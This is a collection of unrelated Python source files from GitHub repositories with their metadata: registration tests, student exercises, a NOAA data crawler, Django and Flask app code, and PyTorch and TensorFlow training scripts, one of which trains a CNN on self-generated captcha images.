|
refs/heads/main
| 2023-08-29T21:58:25.435901
| 2021-10-27T10:05:22
| 2021-10-27T10:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,167
|
py
|
from register import register, _is_user_present
from app_config import db
from app_config import NAME_EMPTY, PSW_EMPTY, PSW_WEAK, USER_PRESENT, \
DB_ERROR, NOT_ADDED
from mock import patch
import pytest
import sqlite3
@pytest.fixture()
def mock_users_table():
"""create inmemory db `users` and fill it with one record"""
db = _make_users_db()
user_record = ("Dick", "123qwe", 10000)
db.cursor().execute("INSERT INTO users VALUES (NULL, ?, ?, ?);", user_record)
db.commit()
return db
@pytest.fixture()
def mock_bad_users_table():
"""create bad db comnnection"""
return _make_broken_users_db()
def test_empty_name():
"""should return tuple with users id=-1 and message"""
assert register("", "123", db) == (-1, NAME_EMPTY)
def test_empty_psw():
"""should return tuple with users id=-1 and message"""
assert register("Bob", "", db) == (-1, PSW_EMPTY)
def test_weak_psw():
"""should return tuple with users id=-1 and message"""
assert register("Bob", "123", db) == (-1, PSW_WEAK)
assert register("Bob", "1a3b", db) == (-1, PSW_WEAK)
assert register("Bob", "123456789", db) == (-1, PSW_WEAK)
assert register("Bob", "qwertyuopa", db) == (-1, PSW_WEAK)
def test_user_present(mock_users_table):
"""should return id=-1 and message if user present"""
with patch('register.db', mock_users_table) as _:
assert register("Dick", "qwer1234", mock_users_table) == (-1, USER_PRESENT)
def test_broken_table(mock_bad_users_table):
"""should return id=-1 and message if error in db"""
with patch('register.db', mock_bad_users_table) as _:
assert register("Bob", "qwer1234", mock_bad_users_table) == (-1, DB_ERROR)
def test_is_user_present(mock_users_table, mock_bad_users_table ):
"""test fanction functionality"""
with patch('register.db', mock_users_table ) as _:
assert _is_user_present("Dick", mock_users_table) == (True, (-1, USER_PRESENT))
with patch('register.db', mock_users_table ) as _:
assert _is_user_present("Bob", mock_users_table) == (False, (-1, NOT_ADDED))
with patch('register.db', mock_bad_users_table) as _:
assert _is_user_present("Dick", mock_bad_users_table) == (False, (-1, DB_ERROR))
def test_register_Ok(mock_users_table):
"""should return id and name if user add success"""
with patch('register.db', mock_users_table) as _:
db = mock_users_table
result = register("Bob", "1234qwert", db)
assert result[0] > 0
assert result[1] == "Bob"
# helpers =======================
def _make_users_db():
"""create fake table in the memory"""
db = sqlite3.connect(":memory:")
cur = db.cursor()
cur.execute("""CREATE TABLE users
(id INTEGER,
username TEXT NOT NULL,
hash TEXT NOT NULL,
cash NUMERIC NOT NULL DEFAULT 10000.00,
PRIMARY KEY(id))""")
db.commit()
return db
def _make_broken_users_db():
"""create broken table in the memory"""
db = sqlite3.connect(":memory:")
return db
|
[
"shkliarskiy@gmail.com"
] |
shkliarskiy@gmail.com
|
e33e2bedd7fe5454ae3ed59196d7d6882a8db79d
|
8473bafb01382d9b257dc39acba95b5c4d20b576
|
/Lab13/p2/main.py
|
c889123224778294d9d27bc61b85a560c0a382c5
|
[] |
no_license
|
rsvalentin/PP
|
616a5d2178d4894930d15e17e7150a7724f9ef88
|
8887a23620fe6bc46d8e086ed26e540274e2d868
|
refs/heads/main
| 2023-06-10T09:15:23.473559
| 2021-05-25T10:16:58
| 2021-05-25T10:16:58
| 382,658,990
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 169
|
py
|
n=int(input("Introdu n ="))
init_list=(n ** 2 for n in range(n))
init_list=list(init_list)
print(init_list)
res=list(filter(lambda x: x % 2 == 0 , init_list))
print(res)
|
[
"romann.valentin@gmail.com"
] |
romann.valentin@gmail.com
|
b135e59d514744f8cb66c3219ec2acd7c9c7bd00
|
f0967325d75f8423c7d8971502c02e82d0249305
|
/CMSE202/in_class_assignments/day-22-in-class/noaa_scraper.py
|
aae1cc4fff24078195ed19c95c57e97f4e25de78
|
[] |
no_license
|
Mart1973/bioinformatics-iGEM-2020
|
9e7a0dbcb058c2de875cf0931d1f185ca8ebc52c
|
acf6ffdac249c6f4013c1c30b55b9eb7a1a14fe9
|
refs/heads/master
| 2022-06-10T16:19:01.705442
| 2020-05-07T03:05:01
| 2020-05-07T03:05:01
| 261,261,836
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,113
|
py
|
#link to libraries neede by this notebook
import os
import numpy as np
from html.parser import HTMLParser
from urllib import parse
from urllib.request import urlopen
from urllib.request import urlretrieve
#following are needed for the progress bar
from ipywidgets import FloatProgress
from IPython.display import display
#use glob to download filenames from a directoery
from glob import glob
# We are going to create a class called LinkParser that inherits some
# methods from HTMLParser which is why it is passed into the definition
class LinkParser(HTMLParser):
# This is a function that HTMLParser normally has
# but we are adding some functionality to it
def handle_starttag(self, tag, attrs):
# We are looking for the begining of a link. Links normally look
# like <a href="www.someurl.com"></a>
if tag == 'a':
for (key, value) in attrs:
if key == 'href':
# We are grabbing the new URL. We are also adding the
# base URL to it. For example:
# www.netinstructions.com is the base and
# somepage.html is the new URL (a relative URL)
#
# We combine a relative URL with the base URL to create
# an absolute URL like:
# www.netinstructions.com/somepage.html
newUrl = parse.urljoin(self.baseUrl, value)
# And add it to our colection of links:
self.links = self.links + [newUrl]
# This is a new function that we are creating to get links
# that our spider() function will call
def getLinks(self, url):
self.links = []
# Remember the base URL which will be important when creating
# absolute URLs
self.baseUrl = url
# Use the urlopen function from the standard Python 3 library
response = urlopen(url)
# Make sure that we are looking at HTML and not other things that
# are floating around on the internet (such as
# JavaScript files, CSS, or .PDFs for example)
if 'text/html' in response.getheader('Content-Type'):
htmlBytes = response.read()
# Note that feed() handles Strings well, but not bytes
# (A change from Python 2.x to Python 3.x)
htmlString = htmlBytes.decode("utf-8")
self.feed(htmlString)
return '',self.links #htmlString, self.links
if 'text/plain' in response.getheader('Content-Type'):
return url,[]
else:
return "",[]
# And finally here is our spider. It takes in an URL, a word to find,
# and the number of pages to search through before giving up
def noaa_spider(url, word, maxPages):
if not os.path.isdir('data'):
os.mkdir('data')
pagesToVisit = [url]
textfiles = [];
numberVisited = 0
foundWord = False
urlsVisited = set()
foundFiles = set()
progressBar = FloatProgress(min=0, max=maxPages)
display(progressBar)
progressBar.value = 0
# The main loop. Create a LinkParser and get all the links on the page.
# Also search the page for the word or string
# In our getLinks function we return the web page
# (this is useful for searching for the word)
# and we return a set of links from that web page
# (this is useful for where to go next)
while numberVisited < maxPages and pagesToVisit != [] and not foundWord:
# Start from the beginning of our collection of pages to visit:
url = pagesToVisit[0]
pagesToVisit = pagesToVisit[1:]
#try:
#print(numberVisited, "Visiting:", url)
parser = LinkParser()
if url not in urlsVisited:
urlsVisited.add(url)
if '.txt' in url:
if word in url:
textfiles = textfiles + [url]
foundFiles.add(url)
print("FOUND ", url)
name='./data/'+url.split('/')[-1]
if not os.path.isfile(name):
print('downloading...',name)
urlretrieve(url,name)
else:
print('file exists...',name)
else:
numberVisited = numberVisited +1
progressBar.value = numberVisited
data, links = parser.getLinks(url)
# Add the pages that we visited to the end of our collection
# of pages to visit:
pagesToVisit = pagesToVisit + links
return foundFiles
def read_data_column(filename, col=8):
f = open(filename, 'r')
filename
air_temperature = []
for row in f:
data = row.split()
temp = float(data[col])
if(temp < -9000): # Check for valid data
#print('IsNan')
if(air_temperature == []): # First point in serise
temp = 0
else:
temp=air_temperature[-1] #Repeat previous data point
else:
temp = temp*9.0/5.0+32
if(temp != []):
air_temperature.append(temp)
f.close()
return air_temperature
def get_airtemperature_from_files():
#Read all Tif images in current directory
from sys import platform
files = glob('./data/*.txt');
files.sort();
progressBar = FloatProgress(min=0, max=len(files))
display(progressBar)
progressBar.value = 0
air_temperature = []
for file in files:
progressBar.value = progressBar.value + 1
if platform == "win32":
name='.\data'+file.split('data')[-1]
else:
name='./data'+file.split('data')[-1]
filename = name
print('reading...',name)
air_temperature = air_temperature + read_data_column(filename)
return air_temperature
def get_noaa_temperatures(url, name, maxdepth=100):
#Now call the main noaa_spider function and search for the word hpc
files = noaa_spider(url, name, 100)
return get_airtemperature_from_files()
|
[
"jense117@msu.edu"
] |
jense117@msu.edu
|
2a12c684d5a4e85e4633e09308985baa95ee93ab
|
6d58114b26a2a5203c2e9b23991fa38008cc076b
|
/mainapp/migrations/0029_auto_20160215_0854.py
|
3ac289dd98e051721fea437831f7f760c3e49ed5
|
[] |
no_license
|
Ancelada/gls
|
498156c72aea45706f008041b4e69fcbad550c89
|
2801f1c61553e76c69ba1079658adedfe5e9f494
|
refs/heads/master
| 2020-04-16T02:30:12.632726
| 2016-06-06T12:07:26
| 2016-06-06T12:07:26
| 49,003,490
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,229
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-02-15 05:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('mainapp', '0028_auto_20160215_0846'),
]
operations = [
migrations.RemoveField(
model_name='verticeswall',
name='Wall',
),
migrations.AddField(
model_name='verticesbuilding',
name='LoadLandscape',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='mainapp.LoadLandscape'),
),
migrations.AddField(
model_name='verticesfloor',
name='LoadLandscape',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='mainapp.LoadLandscape'),
),
migrations.AddField(
model_name='verticeskabinet_n_outer',
name='LoadLandscape',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='mainapp.LoadLandscape'),
),
migrations.DeleteModel(
name='VerticesWall',
),
]
|
[
"danydonatto@pochta.ru"
] |
danydonatto@pochta.ru
|
de20f91f04f9d5ba1bd320eba6830c2ad6d878c6
|
5df73356ab44d1f6a74deaadccf1c9f0de2dee3b
|
/generators.py
|
070cfd9fed8c005692f274f4f3c2996e25efece7
|
[] |
no_license
|
Furtado145/Snakers-and-Ladders
|
8020a72d2a5ac1636e0957016e1bd551eafa5908
|
c611c6c25bb297c564bf318e0528e832575f1871
|
refs/heads/master
| 2023-06-17T00:16:41.568056
| 2021-07-07T18:28:19
| 2021-07-07T18:28:19
| 371,570,668
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,013
|
py
|
import numpy as np
board = list(range(1, 101))
# Generate a dict of random snakes in game
def gen_snakes(x):
dict_snk = {}
v_max = len(board) - 10
v_min = 10
for i in range(x):
key = np.random.randint(v_min, v_max)
if key in dict_snk:
key = np.random.randint(v_min, v_max)
value = key - np.random.randint(5, 10)
if value in dict_snk:
value = key - np.random.randint(5, 10)
dict_snk[key] = value
return dict_snk
# Generate a dict of random ladders in game
def gen_ladders(x):
snk = gen_snakes(x)
dict_lad = {}
v_min = 5
v_max = len(board) - 20
for i in range(x):
key = np.random.randint(v_min, v_max)
if key in dict_lad or key in snk:
key = np.random.randint(v_min, v_max)
value = key + np.random.randint(5, 10)
if value in dict_lad or value in snk:
value = key + np.random.randint(5, 10)
dict_lad[key] = value
return dict_lad
|
[
"felipeffurtado.eng@gmail.com"
] |
felipeffurtado.eng@gmail.com
|
4c7323b9f3ee5682e4e59b2d3ea3a2b23f93fdd5
|
5bda4162d129daf1e4b0ba8191ebce503df0042d
|
/S9/wrapper/train_test.py
|
d051e45110fa420819308df39e55d82ee7731a22
|
[] |
no_license
|
MANU-CHAUHAN/eva5
|
72a6de32fe895087fdd6a7ae7d87b88c6ddc638c
|
8a1cd5e5295752814e019b4d17b1701fb932dffd
|
refs/heads/master
| 2023-01-08T11:25:35.208293
| 2020-11-01T00:28:18
| 2020-11-01T00:28:18
| 287,816,888
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,015
|
py
|
import torch
from wrapper import utility, CONSTANTS
def train_test(*, model, device, train_loader, optimizer, epochs, scheduler, test, test_loader, tracker, loss_fn,
l1_lambda=None, l2_lambda=None):
if CONSTANTS.L1 in utility.get_config_details()[CONSTANTS.REGULARIZATION].keys():
l1_lambda = float(utility.get_config_details()[CONSTANTS.REGULARIZATION][CONSTANTS.L1]),
if CONSTANTS.L2 in utility.get_config_details()[CONSTANTS.REGULARIZATION].keys():
l2_lambda = float(utility.get_config_details()[CONSTANTS.REGULARIZATION][CONSTANTS.L2])
if l1_lambda and l2_lambda:
type_ = "L1L2"
elif not l1_lambda and l2_lambda:
type_ = "L2"
elif l1_lambda and not l2_lambda:
type_ = "L1"
else:
type_ = "w/o_L1L2"
for epoch in range(epochs):
model.train()
l1 = torch.tensor(0, requires_grad=False)
correct = 0
processed = 0
train_loss = 0
print(f"\n\nepoch: {epoch + 1}")
# pbar = tqdm(train_loader)
if l2_lambda:
optimizer.param_groups[0]['weight_decay'] = l2_lambda
print(train_loader)
for i, data in enumerate(train_loader):
inputs, target = data
inputs, target = inputs.to(device), target.to(device)
optimizer.zero_grad() # set the gradients top zero to avoid accumulatin them over the epochs
output = model(inputs) # model's output
loss = loss_fn(output, target)
if l1_lambda:
for param in model.parameters():
l1 = l1 + param.abs().sum()
loss = loss + l1_lambda * l1.item()
loss.backward()
optimizer.step()
pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
processed += len(data)
train_loss += loss.item()
if i % 100 == 0:
print(f"epoch:{epoch + 1}.... batch:{i + 1}...loss:{train_loss:.4f}")
train_loss /= len(train_loader.dataset)
acc = 100 * correct / processed
tracker[type_]['train_losses'].append(train_loss)
tracker[type_]['train_accuracy'].append(acc)
# pbar.set_description(desc=f'loss={loss.item()} batch_id={batch_idx}')
if scheduler:
print(f'\n>>>lr: {scheduler.get_last_lr()[0]}')
scheduler.step()
print(f"\nEpoch : {epoch + 1} Train loss:{train_loss:.4f}")
print("\nTrain set: \t\t Accuracy: {}/{} ({:.6f}%)".format(correct, len(train_loader.dataset),
100.0 * correct / len(train_loader.dataset)))
if test:
model.eval()
test_loss = 0
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.to(device), target.to(device)
output = model(data)
test_loss += loss_fn(output, target).sum().item() # sum up batch loss
pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
for i in range(len(pred)):
if pred[i] != target[i]:
tracker[type_]['misclassified'].append((data[i], pred[i], target[i]))
test_loss /= len(test_loader.dataset)
t_acc = 100.0 * correct / len(test_loader.dataset)
tracker[type_]['test_losses'].append(test_loss)
tracker[type_]['test_accuracy'].append(t_acc)
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.6f}%)\n'.format(
test_loss, correct, len(test_loader.dataset), t_acc))
|
[
"manuchauhan1992@gmail.com"
] |
manuchauhan1992@gmail.com
|
f61c4f77665b0ad6f34b7a5106028f6df2ae3df9
|
e79e3974f877be62f96bb575bbe84c5fe70e68b7
|
/ex041.py
|
b186cea44aeea07cef29bbdf57b65dbf251040fe
|
[] |
no_license
|
anncarln/start-python
|
885ea5b8da8533035ab90edc1e7b52741421b76a
|
964f3ed54a2a05f3999bb30bdcd93dbdf816d0e0
|
refs/heads/master
| 2023-06-29T01:57:47.190743
| 2021-08-08T03:18:31
| 2021-08-08T03:18:31
| 282,767,791
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 470
|
py
|
from datetime import datetime
ano_nasc = int(input('Ano de nascimento: '))
today = datetime.now()
ano_atual = today.year
idade = ano_atual - ano_nasc
if idade <= 9:
print('Classificação do atleta: MIRIM.')
elif idade <= 14:
print('Classificação do atleta: INFANTIL.')
elif idade <= 19:
print('Classificação do atleta: JÚNIOR.')
elif idade <= 25:
print('Classificação do atleta: SÊNIOR.')
else:
print('Classificação do atleta: MASTER.')
|
[
"carolinanna93@gmail.com"
] |
carolinanna93@gmail.com
|
5b48c495ff9736b4c26039bbe62a36c8f57abbbd
|
2923e3a3f4244606aba6d86f8e252db58758f359
|
/happy_client/cms_plugins.py
|
e7d2d9c6790a7fe8f6a9f7f05b6b1f2a1d0071b5
|
[] |
no_license
|
AlexeyKutepov/telegraph-factory-project
|
d026ade3f929b16ec2821637443a5316696de402
|
888437cfadaf78e621b4b4ae52f9eebedf8f3ec7
|
refs/heads/master
| 2021-01-11T11:07:32.380736
| 2017-01-20T09:01:14
| 2017-01-20T09:01:14
| 54,378,224
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 545
|
py
|
from cms.plugin_base import CMSPluginBase
from cms.plugin_pool import plugin_pool
from .models import HappyClient
from django.utils.translation import ugettext_lazy as _
class HappyClientPlugin(CMSPluginBase):
model = HappyClient
name = _("Happy Client Plugin")
render_template = "happy_client.html"
cache = False
def render(self, context, instance, placeholder):
context = super(HappyClientPlugin, self).render(context, instance, placeholder)
return context
plugin_pool.register_plugin(HappyClientPlugin)
|
[
"a.kutepov@voskhod.ru"
] |
a.kutepov@voskhod.ru
|
134f54e4d3b4d14b56b89060ab1e1f65a93c8446
|
b8e6e7d7a1fa78308fdf2c24b4b77cb1827706c5
|
/Tkinter-button.py
|
887fc5984cec006d3271973aee4d9a3749b39d0e
|
[] |
no_license
|
Shaxpy/Experiments-with-GUI
|
14496095c9dac30513352ffe0adda9a19520a584
|
231d6af8435ce5f2b0a73d8f9000837c4d2ee919
|
refs/heads/master
| 2020-12-03T17:57:46.159490
| 2020-06-14T22:31:24
| 2020-06-14T22:31:24
| 231,419,750
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 392
|
py
|
import tkinter
from tkinter import *
root=tkinter.Tk()
root.title("Buttons")
root.geometry("400x500")
bt=Button(root,text="Button 1",width=15,height=2)
bt.pack()
#grid()
#place() ---pixels
bt2=Button(root,text="Button 2",width=15,height=2)
bt2.pack()
bt3=Button(root,text="Button 3",width=15,height=2)
bt3.pack()
bt4=Button(root,text="Link")
bt4.pack(fill=BOTH)
root.mainloop()
|
[
"noreply@github.com"
] |
Shaxpy.noreply@github.com
|
e278cbf87b2c2687625f9ded9ff70b3fd8868829
|
fc4718c75a259c7878970916f33bc420e82562d0
|
/tensorflow_cnn/other/model_train.py
|
8dcc990b079e002eb58d1416b8134b0ee3bfd7da
|
[] |
no_license
|
DzrJob/spider
|
b2f15405caa93ecf185296a2a4ed8b9b4c5123c3
|
cd4b105433a6a83def2bf11c046a3769204cd44e
|
refs/heads/master
| 2020-05-04T00:24:48.535406
| 2019-05-07T14:52:18
| 2019-05-07T14:52:18
| 178,880,953
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,121
|
py
|
# -*- coding:utf-8 -*-
# name: model_train.py
import tensorflow as tf
from datetime import datetime
from util import get_next_batch
from captcha_gen import CAPTCHA_HEIGHT, CAPTCHA_WIDTH, CAPTCHA_LEN, CAPTCHA_LIST
def weight_variable(shape, w_alpha=0.01):
"""
初始化权值
:param shape:
:param w_alpha:
:return:
"""
initial = w_alpha * tf.random_normal(shape)
return tf.Variable(initial)
def bias_variable(shape, b_alpha=0.1):
"""
初始化偏置项
:param shape:
:param b_alpha:
:return:
"""
initial = b_alpha * tf.random_normal(shape)
return tf.Variable(initial)
def conv2d(x, w):
"""
卷基层 :局部变量线性组合,步长为1,模式‘SAME’代表卷积后图片尺寸不变,即零边距
:param x:
:param w:
:return:
"""
return tf.nn.conv2d(x, w, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
"""
池化层:max pooling,取出区域内最大值为代表特征, 2x2 的pool,图片尺寸变为1/2
:param x:
:return:
"""
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
def cnn_graph(x, keep_prob, size, captcha_list=CAPTCHA_LIST, captcha_len=CAPTCHA_LEN):
"""
三层卷积神经网络
:param x: 训练集 image x
:param keep_prob: 神经元利用率
:param size: 大小 (高,宽)
:param captcha_list:
:param captcha_len:
:return: y_conv
"""
# 需要将图片reshape为4维向量
image_height, image_width = size
x_image = tf.reshape(x, shape=[-1, image_height, image_width, 1])
# 第一层
# filter定义为3x3x1, 输出32个特征, 即32个filter
w_conv1 = weight_variable([3, 3, 1, 32]) # 3*3的采样窗口,32个(通道)卷积核从1个平面抽取特征得到32个特征平面
b_conv1 = bias_variable([32])
h_conv1 = tf.nn.relu(conv2d(x_image, w_conv1) + b_conv1) # rulu激活函数
h_pool1 = max_pool_2x2(h_conv1) # 池化
h_drop1 = tf.nn.dropout(h_pool1, keep_prob) # dropout防止过拟合
# 第二层
w_conv2 = weight_variable([3, 3, 32, 64])
b_conv2 = bias_variable([64])
h_conv2 = tf.nn.relu(conv2d(h_drop1, w_conv2) + b_conv2)
h_pool2 = max_pool_2x2(h_conv2)
h_drop2 = tf.nn.dropout(h_pool2, keep_prob)
# 第三层
w_conv3 = weight_variable([3, 3, 64, 64])
b_conv3 = bias_variable([64])
h_conv3 = tf.nn.relu(conv2d(h_drop2, w_conv3) + b_conv3)
h_pool3 = max_pool_2x2(h_conv3)
h_drop3 = tf.nn.dropout(h_pool3, keep_prob)
"""
原始:60*160图片 第一次卷积后 60*160 第一池化后 30*80
第二次卷积后 30*80 ,第二次池化后 15*40
第三次卷积后 15*40 ,第三次池化后 7.5*20 = > 向下取整 7*20
经过上面操作后得到7*20的平面
"""
# 全连接层
image_height = int(h_drop3.shape[1])
image_width = int(h_drop3.shape[2])
w_fc = weight_variable([image_height*image_width*64, 1024]) # 上一层有64个神经元 全连接层有1024个神经元
b_fc = bias_variable([1024])
h_drop3_re = tf.reshape(h_drop3, [-1, image_height*image_width*64])
h_fc = tf.nn.relu(tf.matmul(h_drop3_re, w_fc) + b_fc)
h_drop_fc = tf.nn.dropout(h_fc, keep_prob)
# 输出层
w_out = weight_variable([1024, len(captcha_list)*captcha_len])
b_out = bias_variable([len(captcha_list)*captcha_len])
y_conv = tf.matmul(h_drop_fc, w_out) + b_out
return y_conv
def optimize_graph(y, y_conv):
"""
优化计算图
:param y: 正确值
:param y_conv: 预测值
:return: optimizer
"""
# 交叉熵代价函数计算loss 注意logits输入是在函数内部进行sigmod操作
# sigmod_cross适用于每个类别相互独立但不互斥,如图中可以有字母和数字
# softmax_cross适用于每个类别独立且排斥的情况,如数字和字母不可以同时出现
loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=y, logits=y_conv))
# 最小化loss优化 AdaminOptimizer优化
optimizer = tf.train.AdamOptimizer(1e-3).minimize(loss)
return optimizer
def accuracy_graph(y, y_conv, width=len(CAPTCHA_LIST), height=CAPTCHA_LEN):
"""
偏差计算图,正确值和预测值,计算准确度
:param y: 正确值 标签
:param y_conv: 预测值
:param width: 验证码预备字符列表长度
:param height: 验证码的大小,默认为4
:return: 正确率
"""
# 这里区分了大小写 实际上验证码一般不区分大小写,有四个值,不同于手写体识别
# 预测值
predict = tf.reshape(y_conv, [-1, height, width]) #
max_predict_idx = tf.argmax(predict, 2)
# 标签
label = tf.reshape(y, [-1, height, width])
max_label_idx = tf.argmax(label, 2)
correct_p = tf.equal(max_predict_idx, max_label_idx) # 判断是否相等
accuracy = tf.reduce_mean(tf.cast(correct_p, tf.float32))
return accuracy
def train(height=CAPTCHA_HEIGHT, width=CAPTCHA_WIDTH, y_size=len(CAPTCHA_LIST)*CAPTCHA_LEN):
"""
cnn训练
:param height: 验证码高度
:param width: 验证码宽度
:param y_size: 验证码预备字符列表长度*验证码长度(默认为4)
:return:
"""
# cnn在图像大小是2的倍数时性能最高, 如果图像大小不是2的倍数,可以在图像边缘补无用像素
# 在图像上补2行,下补3行,左补2行,右补2行
# np.pad(image,((2,3),(2,2)), 'constant', constant_values=(255,))
acc_rate = 0.95 # 预设模型准确率标准
# 按照图片大小申请占位符
x = tf.placeholder(tf.float32, [None, height * width])
y = tf.placeholder(tf.float32, [None, y_size])
# 防止过拟合 训练时启用 测试时不启用 神经元使用率
keep_prob = tf.placeholder(tf.float32)
# cnn模型
y_conv = cnn_graph(x, keep_prob, (height, width))
# 优化
optimizer = optimize_graph(y, y_conv)
# 计算准确率
accuracy = accuracy_graph(y, y_conv)
# 启动会话.开始训练
saver = tf.train.Saver()
sess = tf.Session()
sess.run(tf.global_variables_initializer()) # 初始化
step = 0 # 步数
while 1:
batch_x, batch_y = get_next_batch(64)
sess.run(optimizer, feed_dict={x: batch_x, y: batch_y, keep_prob: 0.75})
# 每训练一百次测试一次
if step % 100 == 0:
batch_x_test, batch_y_test = get_next_batch(100)
acc = sess.run(accuracy, feed_dict={x: batch_x_test, y: batch_y_test, keep_prob: 1.0})
print(datetime.now().strftime('%c'), ' step:', step, ' accuracy:', acc)
# 准确率满足要求,保存模型
if acc > acc_rate:
model_path = "./model/captcha.model"
saver.save(sess, model_path, global_step=step)
acc_rate += 0.01
if acc_rate > 0.99: # 准确率达到99%则退出
break
step += 1
sess.close()
if __name__ == '__main__':
train()
|
[
"dzr_job@163.com"
] |
dzr_job@163.com
|
ae8d871248e22663934a067a0893086a8d59a99e
|
7461c2d14236bd5bc50bd0a91dc682b1d1e44980
|
/Problem Set 3 Loop/3.3.6.factorial.py
|
59f1bb743bfe078de999ac7a091906f9474d3551
|
[] |
no_license
|
Jugal-Chanda/python
|
e4aece2eb3c16419be025cb79ff731321978ae3c
|
1549287fcfb2d2339cac79ba1e52f904a5dae07b
|
refs/heads/master
| 2021-09-10T09:14:15.884631
| 2018-03-23T10:55:54
| 2018-03-23T10:55:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 342
|
py
|
#find the factorial of a number
#Author Name : Jugal Kishore Chanda
print("\nAuthor Name : Jugal Kishore Chanda\n\n")
# this program is for finding factorial of a number
print("please input a number for factorial ",end="")
x = int(input())
fact = 1;
for i in range(2,x+1):
fact=fact*i
print(f"The factorial of {x} is {fact}")
|
[
"noreply@github.com"
] |
Jugal-Chanda.noreply@github.com
|
8d12711a7c2803e51801c32746b622d5a4c04a8e
|
c051bafb897c69f3bdd0252709a0d63c0b9d1cca
|
/www.py
|
1c150527f1c2878ada0725977296464d48fa0423
|
[] |
no_license
|
IronPanda0/pethos
|
bdf08f9f777a199b33cc63b5f50002985c7a1b5a
|
3f359560d68c60d14aba24c4c04f66158cea522c
|
refs/heads/master
| 2023-04-09T11:43:07.167992
| 2021-04-02T16:30:32
| 2021-04-02T16:30:32
| 352,262,287
| 0
| 1
| null | 2021-04-19T02:30:54
| 2021-03-28T06:56:29
|
Vue
|
UTF-8
|
Python
| false
| false
| 1,060
|
py
|
from flask_sqlalchemy import SQLAlchemy
from init import *
from system.view import welcome
from system.testModule.question import question
from system.caseModule.case import case
from system.caseModule.animal import animal
from system.caseModule.category import category
from system.caseModule.disease import disease
from system.costModule.executes import executes
from system.costModule.consumables import consumables
from system.testModule.test import test
from flask_debugtoolbar import DebugToolbarExtension
from interceptor.errorHandler import *
from common.urlmanager import UrlManager
toolbar = DebugToolbarExtension(app)
# 蓝图注册
app.register_blueprint(welcome)
app.register_blueprint(question)
app.register_blueprint(case)
app.register_blueprint(animal)
app.register_blueprint(category)
app.register_blueprint(disease)
app.register_blueprint(executes)
app.register_blueprint(consumables)
app.register_blueprint(test)
app.add_template_global( UrlManager.buildStaticUrl,'buildStaticUrl' )
app.add_template_global( UrlManager.buildUrl,'buildUrl' )
|
[
"2632235311@qq.com"
] |
2632235311@qq.com
|
ca2a80d1d23ffb8ac32db9977cd08b406b4fc2d8
|
fc212767c6c838360b62a3dcd8030a1dfcbf62fc
|
/muddery/events/event_actions/action_message.py
|
c2917e6eefab1d69712c5a206e623b98a83b241a
|
[
"BSD-3-Clause"
] |
permissive
|
caibingcheng/muddery
|
24d6eba76358621736e6a3d66333361239c35472
|
dcbf55f4e1c18a2c69576fd0edcec4699c1519b9
|
refs/heads/master
| 2021-05-19T09:49:19.319735
| 2020-03-29T03:55:51
| 2020-03-29T03:55:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 967
|
py
|
"""
Event action.
"""
import random
from django.apps import apps
from django.conf import settings
from muddery.events.base_interval_action import BaseIntervalAction
from muddery.utils.localized_strings_handler import _
class ActionMessage(BaseIntervalAction):
"""
Attack a target.
"""
key = "ACTION_MESSAGE"
name = _("Message", category="event_actions")
model_name = "action_message"
repeatedly = True
def func(self, event_key, character, obj):
"""
Send a message to the character.
Args:
event_key: (string) event's key.
character: (object) relative character.
obj: (object) the event object.
"""
# get action data
model_obj = apps.get_model(settings.WORLD_DATA_APP, self.model_name)
records = model_obj.objects.filter(event_key=event_key)
# send messages
for record in records:
character.msg(record.message)
|
[
"luyijun999@gmail.com"
] |
luyijun999@gmail.com
|
deecc2d8cc30d19df956fb3e1b6e5a9aeb4f7031
|
bb2c221ceea66ddd82387c4b40d4b04b6e1836aa
|
/Esoft/cadastro/views.py
|
6afbb14c7b07e4d6e706cbc1e5de38593ab3f007
|
[] |
no_license
|
diegobonani/Django
|
f583a2f3ef9ec665b2196c0ed2189f88fcdaac90
|
d2a95752224ec79e9c9804c66abf1104ef952368
|
refs/heads/main
| 2023-03-03T05:48:08.254754
| 2021-02-09T07:01:23
| 2021-02-09T07:01:23
| 337,309,631
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,714
|
py
|
from django.shortcuts import HttpResponse, render, redirect, get_object_or_404
from .models import CadastroPessoas
from .forms import RegistrarForms
import requests
def pessoasCadastradas(request):
data = CadastroPessoas.objects.all()
return render(request, 'pessoasCadastradas.html', {'data': data})
def paginaInicial(request):
api = requests.get('https://gerador-nomes.herokuapp.com/nome/aleatorio')
gereNome = api.json()
form = RegistrarForms(request.POST or None)
form.fields["nome"].initial = gereNome[0] + " " + gereNome[1]
form.fields['sobrenome'].initial = gereNome[2]
if form.is_valid():
try:
form.save()
return redirect('pessoasCadastradas')
except:
pass
return render(request, 'formulario.html', {'form': form})
def update_pessoas(request,id):
data = {}
cadastrao = CadastroPessoas.objects.get(id=id)
